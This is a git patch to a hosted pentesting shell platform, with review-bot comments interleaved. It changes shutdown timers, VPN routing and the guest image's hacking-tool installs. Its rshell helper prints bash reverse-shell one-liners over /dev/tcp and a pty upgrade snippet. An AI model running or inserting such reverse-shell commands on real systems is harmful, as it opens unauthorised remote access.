From 44f0018fff4c2792914152a479bf6b74d837ca67 Mon Sep 17 00:00:00 2001 From: SkyperTHC Date: Sat, 20 Jan 2024 20:44:05 +0000 Subject: [PATCH] guest docker bumping --- ChangeLog | 5 +- Makefile | 4 +- config/etc/nginx/nginx-rpc.conf | 20 ++-- config/etc/sf/timers.conf | 6 + docker-compose.yml | 3 +- encfsd/Dockerfile | 2 +- encfsd/destructor.sh | 149 +++---------------------- encfsd/funcs_destructor.sh | 153 ++++++++++++++++++++++++++ guest/Dockerfile | 11 +- guest/fs-root/etc/shellrc | 4 +- guest/fs-root/sf/bin/rshell | 28 ++--- host/Makefile | 27 +++-- host/fs-root/bin/segfaultsh | 18 +-- host/mk_sshd.sh | 12 +- host/sf-sshd.patch | 34 +++--- master/cgi-bin/rpc | 73 ++++++------ master/ready-lg.sh | 4 +- provision/env.example | 8 +- sfbin/funcs.sh | 2 +- sfbin/funcs_admin.sh | 15 ++- sfbin/{funcs_vpn.sh => funcs_ovpn.sh} | 10 +- 21 files changed, 324 insertions(+), 264 deletions(-) create mode 100644 config/etc/sf/timers.conf create mode 100755 encfsd/funcs_destructor.sh rename sfbin/{funcs_vpn.sh => funcs_ovpn.sh} (99%) diff --git a/ChangeLog b/ChangeLog index 2b699ea..02856bb 100644 --- a/ChangeLog +++ b/ChangeLog @@ -1,7 +1,10 @@ 0.5.4 - 2023-02-00 + * OpenSSH 9.6p1 * rshell * sploitscan - * OpenVPN (curl sf/vpn) + * OpenVPN (curl sf/ovpn) + * Different auto-shutdown timers for FREE and TOKEN users + * Syscop login message after auto-shutdown 0.5.2 - 2023-12-00 * Kali 2023.4 diff --git a/Makefile b/Makefile index 0184105..76529c9 100644 --- a/Makefile +++ b/Makefile @@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile" FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile" FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh" +FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh" 
@@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh" FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf" +FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt" FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf" @@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh" -FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh" +FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh" FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh" FILES_ROOT += "segfault-$(VER)/sfbin/sf" FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh" diff --git a/config/etc/nginx/nginx-rpc.conf b/config/etc/nginx/nginx-rpc.conf index eaba919..80feb42 100644 --- a/config/etc/nginx/nginx-rpc.conf +++ b/config/etc/nginx/nginx-rpc.conf @@ -69,13 +69,15 @@ http { gzip off; location / { - try_files $uri $uri/ = 404; - rewrite /net /net/; - rewrite /vpn /vpn/; - rewrite /wg /wg/; - rewrite /dmesg /dmesg/; - rewrite /port /port/; - rewrite /set /set/; + #try_files $uri $uri/ = 404; + rewrite ^/net$ /net/ last; + rewrite ^/ovpn$ /ovpn/ last; + rewrite ^/vpn$ /ovpn/ last; + rewrite ^/wg$ /wg/ last; + rewrite ^/dmesg$ /dmesg/ last; + rewrite ^/port$ /port/ last; + rewrite ^/set$ /set/ last; + rewrite ^/vpn/(.*)$ /ovpn/$1 last; location ~* ^/set/.* { fastcgi_param REMOTE_ADDR $remote_addr; 
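Review bot: Commenting out `try_files $uri $uri/ = 404;` in `location /` drops the only 404 fallback visible in this hunk, with no note on why and nothing taking its place. Unless the remainder of `location /` (outside the hunk) ends with an explicit `return 404;`, a request that matches none of the anchored rewrites now reaches nginx's static-file handler for the server root instead of failing. I would delete the dead line rather than keep it commented and close the block with `return 404; # anything not rewritten into one of the regex locations above is not an RPC endpoint`, placed after the rewrites so the `rewrite ... last` chain is still evaluated first. A one-line comment on why `try_files` had to go (it would 404 before the rewrites could redirect into the fastcgi locations, presumably) would spare the next reader the same investigation.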
@@ -101,11 +103,11 @@ http { fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc; fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket; } - location ~* ^/vpn/.* { + location ~* ^/ovpn/.* { fastcgi_param REMOTE_ADDR $remote_addr; fastcgi_param REQUEST_URI $request_uri; fastcgi_param REQUEST_BODY $request_body; - fastcgi_param FCGI_CMD vpn; + fastcgi_param FCGI_CMD ovpn; fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc; fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket; } diff --git a/config/etc/sf/timers.conf b/config/etc/sf/timers.conf new file mode 100644 index 0000000..89063a3 --- /dev/null +++ b/config/etc/sf/timers.conf @@ -0,0 +1,6 @@ +#SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36)) +#SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1)) +#SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7)) +#SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36)) + + diff --git a/docker-compose.yml b/docker-compose.yml index 4553539..4aa03b7 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -40,7 +40,7 @@ services: devices: - "/dev/fuse:/dev/fuse" volumes: - - "${SF_BASEDIR:-.}/config/db:/config/db:ro" + - "${SF_BASEDIR:-.}/config/db:/config/db:rw" - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro" - "${SF_BASEDIR:-.}/data:/encfs/raw" - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared" @@ -76,6 +76,7 @@ services: - "/dev/fuse:/dev/fuse" volumes: - "${SF_BASEDIR:-.}/config/db:/config/db:ro" + - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro" - "${SF_BASEDIR:-.}/data:/encfs/raw" - "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest" - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared" diff --git a/encfsd/Dockerfile b/encfsd/Dockerfile index 32763e9..2f8fe2c 100644 --- a/encfsd/Dockerfile +++ b/encfsd/Dockerfile @@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \ encfs \ redis \ xfsprogs-extra -COPY destructor.sh encfsd.sh portd.sh / +COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh / diff --git a/encfsd/destructor.sh b/encfsd/destructor.sh index 76b5959..5ef51da 100755 
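Review bot: The new config/etc/sf/timers.conf has no header explaining what it is, yet encfsd/destructor.sh runs it with `source` every 30 seconds, so whatever is written there executes with the destructor's privileges (a process that also gets `/var/run/docker.sock`) within half a minute of being saved. A reader will not guess from four commented examples that a stray command, or an empty `SF_TIMEOUT_WITH_SHELL=`, is live config rather than documentation. Add a header such as `# Sourced as bash by encfsd/destructor.sh every 30s. Only integer SF_TIMEOUT_*=<seconds> assignments belong here; uncomment a line to override the built-in default shown.` The example values match the defaults in destructor.sh, which is helpful, but the file should say so explicitly.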
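Review bot: Changing the encfsd mount of `config/db` from `:ro` to `:rw` hands the destructor write access to every user's persistent DB directory, while the only new write this patch shows is `syscop-msg.txt` under `/config/db/user/lg-<lid>/`. For a process that also holds docker.sock that is wider than needed: a mistake in lid handling or an extra path in stop_lg's `rm -rf` list would now reach the user DB instead of failing on a read-only mount. If the message must be a file, consider mounting a dedicated writable subdirectory for it and keeping the rest of `config/db` read-only, or have the destructor hand the text to sf-master via redis (stop_lg already pushes to `portd:cmd`) and let the component that owns the DB write it. Either way the compose line deserves a trailing comment naming the file that needs the write access, so the next person does not tighten it back to `:ro` and break the login message.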
--- a/encfsd/destructor.sh
+++ b/encfsd/destructor.sh
@@ -3,149 +3,28 @@ # shellcheck disable=SC1091 # Do not follow source /sf/bin/funcs.sh source /sf/bin/funcs_redis.sh - -SF_TIMEOUT_WITH_SHELL=604800 -SF_TIMEOUT_NO_SHELL=129600 + +# Defaults +SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36)) +SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1)) +SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7)) +SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36)) [[ -n $SF_DEBUG ]] && { - SF_TIMEOUT_WITH_SHELL=180 - SF_TIMEOUT_NO_SHELL=120 -} - -# [LID] <1=encfs> <1=Container> -# Either parameter can be "" to not stop encfs or lg-container -stop_lg() -{ - local is_encfs - local is_container - local lid - local ts_born - lid="$1" - ts_born="$2" - is_encfs="$3" - is_container="$4" - - LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5" - - red RPUSH portd:cmd "remport ${lid}" >/dev/null - rm -f "/sf/run/encfsd/user/lg-${lid}" - rm -f "/sf/run/pids/lg-${lid}.pid" - rm -f "/sf/run/ips/lg-${lid}.ip" - rm -rf "/config/self-for-guest/lg-${lid}" - rm -rf "/sf/run/users/lg-${lid}" - - # Kill the OpenVPN process (if running) - docker exec sf-master killall "openvpn-$lid" 2>/dev/null - docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null - - # Tear down container - [[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill - - # Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running - # inside the container even that we never moved it into the container's - # Process Namespace. EncFS will also die when the lg- is shut down. - # This is only neede for cgroup1: - [[ -n $is_encfs ]] && { - pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null - # Give kernel time to unmount mountpoint - sleep 1 - } - # Do not use 'rm -rf' here as this might still be a mounted drive - # when encfsd is not killed fast enough (failing to delete is acceptable). - rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt" - rmdir "/encfs/sec/lg-${lid}" -} - -# [lg-$LID] -# Check if lg- is running and -# 1. EncFS died -# 2. 
Container should be stopped (stale, idle) -check_container() -{ - local c - local lid - local i - local IFS - local fn - local comm - local ts_logout - local ts_born - IFS=$'\n' - - c="$1" - lid="${c#lg-}" - - [[ ${#lid} -ne 10 ]] && return - - ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; } - # Skip if EncFS only started recently (zsh not yet started). - [[ $((NOW - ts_born)) -lt 20 ]] && return 0 - - # Check if EncFS is still running. - pgrep -f "^\[encfs-${lid}\]" &>/dev/null || { - # NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop') - stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..." - return - } - - # ts_logout may not exist (stale) - ts_logout=0 - fn="/config/db/user/lg-${lid}/ts_logout" - [[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn") - - # Check if there is still a shell running inside the container: - IFS="" - set -o pipefail - comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || { - # HERE: lg died or top failed. - set +o pipefail - stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running." - return - } - set +o pipefail - # Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare - # condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo - # will receive a SIGPIPE and exit with 141 and the entire pipe will fail. - - # [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return - # FIXME: many stale is_logged_in exists without ssh connected ;/ - - # HERE: LG & EncFS are running. - echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && { - # HERE: User still has shell running - [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return - [[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return - # HERE: Not logged in. logged out more than 1 week ago. 
- - stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)." - return - } - # HERE: No shell running, ts_logout=0 if never logged out - - # Skip if only recently logged out. - [[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out. - - # Filter out stale processes - echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || { - # HERE: Nothing running but stale processes - stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running." - return - } - # HERE: Something running (but no shell, and no known processes) - - [[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && { - # User logged out 1.5 days ago. No shell. No known processes. - stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)." - return - } - - # HERE: No shell. No known processes. Less than 1.5 days ago. + SF_TIMEOUT_WITH_SHELL=60 + SF_TIMEOUT_NO_SHELL=15 + SF_TIMEOUT_TOKEN_WITH_SHELL=120 + SF_TIMEOUT_TOKEN_NO_SHELL=90 } [[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock" +source /funcs_destructor.sh || ERREXIT 255 + export REDISCLI_AUTH="${SF_REDIS_AUTH}" while :; do sleep 30 + source /config/etc/sf/timers.conf 2>/dev/null + source /funcs_destructor.sh 2>/dev/null NOW=$(date +%s) # Every 30 seconds check all container we are tracking (from encfsd) containers=($(cd /sf/run/encfsd/user && echo lg-*)) diff --git a/encfsd/funcs_destructor.sh b/encfsd/funcs_destructor.sh new file mode 100755 index 0000000..a94ba8a --- /dev/null +++ b/encfsd/funcs_destructor.sh 
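Review bot: The loop now re-sources `/config/etc/sf/timers.conf` every 30 seconds and feeds the four SF_TIMEOUT_* values straight into `[[ ... -lt ${to_with_shell} ]]` comparisons in check_container without checking them. Inside `[[`, the operands of `-lt` are evaluated as arithmetic, so as far as I can tell an empty assignment (`SF_TIMEOUT_WITH_SHELL=`) or a bare word becomes 0 and every idle server is stopped on the next pass, which is the opposite of failing safe; and because the defaults are assigned once before the loop, a line that an operator later removes from timers.conf keeps its old value until the daemon restarts. The `2>/dev/null` on both `source` lines also hides a syntax error in either file, so a broken hot-reload goes unnoticed while the previous definitions keep running. I would snapshot the defaults, restore them before each source, and reject anything that is not an unsigned integer, logging through the existing `ERR`; the while loop body continues past the end of this hunk.

```shell
# … unchanged: defaults and SF_DEBUG overrides …
# Remember the built-in defaults so a bad or removed timers.conf line falls back to them.
for v in SF_TIMEOUT_WITH_SHELL SF_TIMEOUT_NO_SHELL SF_TIMEOUT_TOKEN_WITH_SHELL SF_TIMEOUT_TOKEN_NO_SHELL; do
	printf -v "DEFAULT_${v}" '%s' "${!v}"
done
# … unchanged: docker.sock check, first source of funcs_destructor.sh, REDISCLI_AUTH …
while :; do
	sleep 30
	# timers.conf is executed as bash. Reset to the defaults first so a setting that was
	# removed from the file does not linger from an earlier iteration.
	for v in SF_TIMEOUT_WITH_SHELL SF_TIMEOUT_NO_SHELL SF_TIMEOUT_TOKEN_WITH_SHELL SF_TIMEOUT_TOKEN_NO_SHELL; do
		d="DEFAULT_${v}"; printf -v "$v" '%s' "${!d}"
	done
	source /config/etc/sf/timers.conf 2>/dev/null || ERR "timers.conf failed to load; keeping defaults."
	source /funcs_destructor.sh 2>/dev/null || ERR "funcs_destructor.sh failed to reload; keeping old definitions."
	# In [[ -lt ]] an empty or non-numeric value evaluates as arithmetic (usually to 0), which would
	# make check_container() stop every idle server at once. Fall back to the default instead.
	for v in SF_TIMEOUT_WITH_SHELL SF_TIMEOUT_NO_SHELL SF_TIMEOUT_TOKEN_WITH_SHELL SF_TIMEOUT_TOKEN_NO_SHELL; do
		[[ ${!v} =~ ^[0-9]+$ ]] || { d="DEFAULT_${v}"; ERR "timers.conf: ${v}='${!v}' is not a number. Using ${!d}."; printf -v "$v" '%s' "${!d}"; }
	done
	NOW=$(date +%s)
	# … unchanged: iterate over /sf/run/encfsd/user/lg-* …
```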
@@ -0,0 +1,153 @@ + +# [LID] <1=encfs> <1=Container> +# Either parameter can be "" to not stop encfs or lg-container +stop_lg() +{ + local is_encfs + local is_container + local lid + local ts_born + lid="$1" + ts_born="$2" + is_encfs="$3" + is_container="$4" + + LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5" + + red RPUSH portd:cmd "remport ${lid}" >/dev/null + rm -f "/sf/run/encfsd/user/lg-${lid}" + rm -f "/sf/run/pids/lg-${lid}.pid" + rm -f "/sf/run/ips/lg-${lid}.ip" + rm -rf "/config/self-for-guest/lg-${lid}" + rm -rf "/sf/run/users/lg-${lid}" + + # Kill the OpenVPN process (if running) + docker exec sf-master killall "openvpn-$lid" 2>/dev/null + docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null + + # Tear down container + [[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill + + # Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running + # inside the container even that we never moved it into the container's + # Process Namespace. EncFS will also die when the lg- is shut down. + # This is only neede for cgroup1: + [[ -n $is_encfs ]] && { + pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null + # Give kernel time to unmount mountpoint + sleep 1 + } + # Do not use 'rm -rf' here as this might still be a mounted drive + # when encfsd is not killed fast enough (failing to delete is acceptable). + rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt" + rmdir "/encfs/sec/lg-${lid}" +} + +try_syscop_msg() { + local lid="$1" + echo -en "\ +🤷‍♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h. +🫵 Please type ${CDC}halt${CDM} to stop your server or... +❤️ ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM} + +🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN} +">"/config/db/user/lg-${lid:?}/syscop-msg.txt" +} + +# [lg-$LID] +# Check if lg- is running and +# 1. EncFS died +# 2. 
Container should be stopped (stale, idle) +check_container() +{ + local c + local lid + local IFS=$'\n' + local fn + local comm + local ts_logout + local ts_born + local to_with_shell=$SF_TIMEOUT_WITH_SHELL + local to_no_shell=$SF_TIMEOUT_NO_SHELL + local is_token + + c="$1" + lid="${c#lg-}" + + [[ ${#lid} -ne 10 ]] && return + + ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; } + # Skip if EncFS only started recently (zsh not yet started). + [[ $((NOW - ts_born)) -lt 20 ]] && return 0 + + # Check if EncFS is still running. + pgrep -f "^\[encfs-${lid}\]" &>/dev/null || { + # NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop') + stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..." + return + } + + # ts_logout may not exist (stale) + ts_logout=0 + fn="/config/db/user/lg-${lid}/ts_logout" + [[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn") + + # Check if there is still a shell running inside the container: + IFS="" + set -o pipefail + comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || { + # HERE: lg died or top failed. + set +o pipefail + stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running." + return + } + + # Load timers + [[ -e "/config/db/user/lg-${lid}/token" ]] && { + to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL + to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL + is_token=1 + } + set +o pipefail + # Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare + # condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo + # will receive a SIGPIPE and exit with 141 and the entire pipe will fail. + + # [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return + # FIXME: many stale is_logged_in exists without ssh connected ;/ + + # HERE: LG & EncFS are running. 
+ echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && { + # HERE: User still has shell running + [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return + [[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return + # HERE: Not logged in. logged out more than 1 week ago. + stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)." + [[ -z $is_token ]] && try_syscop_msg "$lid" + + return + } + # HERE: No shell running, ts_logout=0 if never logged out + + # Skip if only recently logged out. + [[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out. + + # Filter out stale processes + echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || { + # HERE: Nothing running but stale processes + stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running." + return + } + # HERE: Something running (but no shell, and no known processes) + + [[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && { + # User logged out 1.5 days ago. No shell. No known processes. + + stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)." + [[ -z $is_token ]] && try_syscop_msg "$lid" + + return + } + + # HERE: No shell. No known processes. Less than 1.5 days ago. +} diff --git a/guest/Dockerfile b/guest/Dockerfile index 0cab665..4bf8d73 100644 --- a/guest/Dockerfile +++ b/guest/Dockerfile 
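Review bot: In stop_lg the container teardown redirects to `&>/dev/nuill`, a typo for `/dev/null`, so the output of `docker stop` is presumably appended to a regular file called /dev/nuill inside the encfsd container instead of being discarded; the line was carried over from destructor.sh with the typo intact and this new file is the place to fix it: `[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/null` (the nearby comment also has `neede` for `needed`). Separately, try_syscop_msg declares only `lid` as a parameter but reads `ts_logout` and `NOW` from check_container's scope via bash's dynamic scoping, which works today and will silently print nonsense the first time the helper is called from anywhere else; pass the timestamp explicitly with `local lid="$1" ts_logout="$2"` and `try_syscop_msg "$lid" "$ts_logout"` at both call sites. The message is written under `/config/db/user/lg-${lid}/`, which is the reason docker-compose now mounts config/db read-write into encfsd, and that coupling is worth a sentence in a header comment on the function so the mount is not tightened back without noticing.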
@@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6 && /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \ && mkdir -p /usr/share/gf \ - && svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \ + && git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \ && mv /tmp/gf/examples/*.json /usr/share/gf \ && mv /tmp/gf/gf-completion.* /usr/share/gf \ && rm -rf /tmp/gf \ - && svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \ + && git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \ && mv /tmp/gf/*.json /usr/share/gf; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \ @@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6 && cmake . \ && make \ && cp urldedupe /usr/bin; }' \ - && /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \ + && /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \ + && rm -rf /opt/username-anarchy/.git*; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \ 
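Review bot: Replacing `svn export .../trunk` with `git clone --depth 1` keeps fetching whatever the default branch of tomnomnom/gf, 1ndianl33t/Gf-Patterns and urbanadventurer/username-anarchy points at when the image is built, and the result is installed unverified into /usr/share/gf and /opt/username-anarchy. Since the fetch mechanism is being rewritten anyway, this is the natural moment to pin each to a commit so the image is reproducible and a compromised upstream branch cannot land in every new guest: `git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf && git -C /tmp/gf fetch --depth 1 origin <commit> && git -C /tmp/gf checkout <commit>`, with the hash kept next to the URL. The rest of this Dockerfile uses `@latest` for the Go tools, so if floating versions are a deliberate choice for the hacking toolset, a one-line comment at the top of this RUN saying so would stop reviewers raising it again. The RUN instruction this hunk belongs to starts before and ends after the hunk.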
@@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore '%arch:aarch64=arm%-unknown-linux' && /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \ && /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \ && /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r -RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker \ - && /pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb' +RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker + ## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb' RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \ && chmod 755 /usr/bin/favfreak.py \ && ln -s favfreak.py /usr/bin/FavFreak; }' \ diff --git a/guest/fs-root/etc/shellrc b/guest/fs-root/etc/shellrc index 89fa2f0..3f3969f 100644 --- a/guest/fs-root/etc/shellrc +++ b/guest/fs-root/etc/shellrc @@ -293,8 +293,10 @@ alias nocol=noansi # Make the Project name visibile in the PS1 prompt [[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}" -PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH" + +PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH" [[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples" +export PATH _sf_info_non_perm() { diff --git a/guest/fs-root/sf/bin/rshell b/guest/fs-root/sf/bin/rshell index 29d0870..43f6d72 100755 --- a/guest/fs-root/sf/bin/rshell +++ b/guest/fs-root/sf/bin/rshell 
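Review bot: The yanked PowerShell install survives as a comment whose explanation runs straight into the old command text, `## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin ...`, which reads as though `powershell/pkg-install.sh` were a path. Git keeps the history, so the line can simply be deleted; if a reminder is wanted, make it a sentence that cannot be misread, e.g. `# PowerShell is installed via apt-get (package 'powershell'); do not re-add the GitHub .deb here.` The kalker RUN above it is now a single instruction, so the stray continuation is not a build problem, only a readability one.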
@@ -16,31 +16,31 @@ ERREXIT() { exit "${code:-99}" } +[[ ! -f /config/self/reverse_port ]] && curl sf/port load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}." load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}." echo -e "\ -Use any of these commands on the remote system:${CDR} - bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &' - (bash -i &>/dev/tcp/${rip}/${rport} 0>&1) & -${CN} -Once connected, cut & paste this into the remote shell:${CDC} +Use one of these commands on the remote system: + 1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN} + 2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN} +${CN}Once connected, cut & paste the following into the _this_ shell: +${CF}-------------------------------------------------------------------------------${CDC} command -v python >/dev/null \\ - && exec python -c 'import pty; pty.spawn(\"bash\")' \\ - || exec script -qc bash /dev/null - -export SHELL=/bin/bash -export TERM=xterm-256color + && exec python -c 'import pty; pty.spawn(\"bash\")' \\ + || exec script -qc bash /dev/null +export SHELL=/bin/bash TERM=xterm-256color reset -I 